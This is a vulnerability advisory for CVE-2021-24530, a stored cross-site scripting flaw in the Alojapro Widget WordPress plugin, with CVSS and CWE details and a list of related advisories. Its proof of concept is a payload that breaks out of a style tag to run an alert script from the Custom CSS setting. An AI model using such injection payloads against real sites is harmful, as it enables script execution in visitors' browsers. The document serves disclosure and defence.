Alojapro Widget < 1.1.16 – Authenticated Stored Cross-Site Scripting (XSS) | CVE 2021-24530

Description

The plugin doesn't properly sanitise its Custom CSS settings, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed

Proof of Concept

Put the following code in the Custom CSS settings of the plugin

</style>
<script>
setTimeout("alert('1')",3000)
</script>
<style>

Affects Plugins

alojapro-widget

Fixed in 1.1.16

References

CVE

CVE-2021-24530

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

CVSS

3.8 (low)

Miscellaneous

Original Researcher

xiahao

Submitter

xiahao

Submitter twitter

lAmn9V6MU9Dfb8p

Verified

Yes

WPVDB ID

caf36ca5-aafd-48bd-a1e5-30f3973d8eb8

Timeline

Publicly Published

2021-07-29 (about 2 years ago)

Added

2021-08-19 (about 2 years ago)

Last Updated

2022-04-09 (about 2 years ago)

Other

Published

Title

Published

2021-08-13

Title

Simple Behance Portfolio <= 0.2 - Reflected Cross-Site Scripting

Published

2014-08-01

Title

wp-topbar <= 3.04 - XSS in ZeroClipboard.swf

Published

2021-08-17

Title

MF Gig Calendar < 1.2 - Reflected Cross-Site Scripting (XSS)

Published

2022-06-13

Title

WP Contact Slider < 2.4.7 - Editor+ Stored Cross-Site Scripting

Published

2023-09-11

Title

Socialdriver < 2024 - Prototype Pollution to XSS